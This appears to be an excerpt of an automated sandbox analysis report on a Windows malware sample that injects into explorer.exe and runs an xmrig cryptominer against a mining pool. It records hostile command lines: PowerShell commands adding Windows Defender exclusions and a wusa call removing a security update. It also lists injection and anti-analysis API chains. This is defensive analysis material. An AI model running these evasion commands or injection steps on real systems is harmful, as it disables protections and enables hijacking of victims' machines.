                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep count: 3979 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 6773 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 424Thread sleep count: 2905 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\explorer.exe TID: 4412Thread sleep count: 81 > 30
                        Source: C:\Windows\explorer.exe TID: 5936Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DCA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,0_2_007DCA90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D3620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_007D3620
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_00BE97F0
                        Source: C:\Windows\explorer.exeCode function: 33_2_01397FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,33_2_01397FB0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,35_2_027B7FB0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,36_2_029F7FB0
                        Source: C:\Windows\explorer.exeCode function: 33_2_013ABBF0 GetSystemInfo,33_2_013ABBF0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYR
                        Source: explorer.exe, 00000004.00000002.4653485201.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2168797360.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2203432137.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396903926.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2190178303.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3760997418.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2178464277.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2233935293.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.0000000000699000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2847225481.000000000121B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: explorer.exe, 00000004.00000002.4652932709.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                        Source: explorer.exe, 00000024.00000003.4497641293.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4410054060.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4502622394.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4433977637.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.4570558488.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4458050505.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4472943220.00000000011AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                        Source: explorer.exe, 00000004.00000003.3081706476.0000000002ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g"e
                        Source: explorer.exe, 00000004.00000002.4652932709.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: file.exe, 00000000.00000002.2119116679.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2446674582.000000000125B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3610623198.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3696904941.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.3723459059.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3661850005.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3648865816.0000000000EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17627
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17619
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17616
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17642
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-20398
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-18806
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17696
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17646
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17645
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17712
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17680
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-18811
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17700
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-18817
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17683
                        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-17651
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_4-17429
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E7111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E7111
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,0_2_007DCA00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C5720 GetCurrentProcess,IsWow64Process,GetProcessHeap,0_2_007C5720
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EA950 SetUnhandledExceptionFilter,0_2_007EA950
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E7111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E7111
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E7FFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007E7FFF
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0E488 SetUnhandledExceptionFilter,4_2_00C0E488
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0C4B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00C0C4B0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C10D64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00C10D64
                        Source: C:\Windows\explorer.exeCode function: 4_2_00C0A6E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00C0A6E8
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 8_2_00007FF60AA91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,8_2_00007FF60AA91160
                        Source: C:\Windows\explorer.exeCode function: 33_2_01455890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_01455890
                        Source: C:\Windows\explorer.exeCode function: 33_2_01452A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_01452A80
                        Source: C:\Windows\explorer.exeCode function: 35_2_02872A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_02872A80
                        Source: C:\Windows\explorer.exeCode function: 35_2_02875890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_02875890
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB2A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_02AB2A80
                        Source: C:\Windows\explorer.exeCode function: 36_2_02AB5890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_02AB5890

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Benign windows process drops PE files
                        Source: C:\Windows\explorer.exeFile created: WindosCPUsystem.exe.4.drJump to dropped file
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                        Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 5200Jump to behavior
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CA1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_007CA1B0
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 6196 base: 140000000 value: 4DJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 6196 base: 140001000 value: NUJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 6196 base: 140665000 value: DFJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 6196 base: 140834000 value: 00Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeMemory written: PID: 6196 base: 475010 value: 00Jump to behavior
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Modifies the context of a thread in another process (thread injection)
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeThread register set: target process: 6196Jump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4410 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_007C4410
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C44E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_007C44E0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE42E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_00BE42E0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BE43D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_00BE43D0
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BEA3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,4_2_00BEA3B0
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0400 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_007D0400
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DC3A0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007DC3A0
                        Source: explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ufalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}NN
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Managermh
                        Source: explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768851377.0000000000765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
                        Source: explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390678126.0000000002C40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerpool.hashvault.pro46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                        Source: explorer.exe, 00000020.00000003.3391079350.0000000000787000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390986880.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":60,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":689.4497400346621,"status":2}
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}NN
                        Source: explorer.exe, 00000020.00000003.3768750703.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":120,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":602.4033437826541,"status":2}
                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: falyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
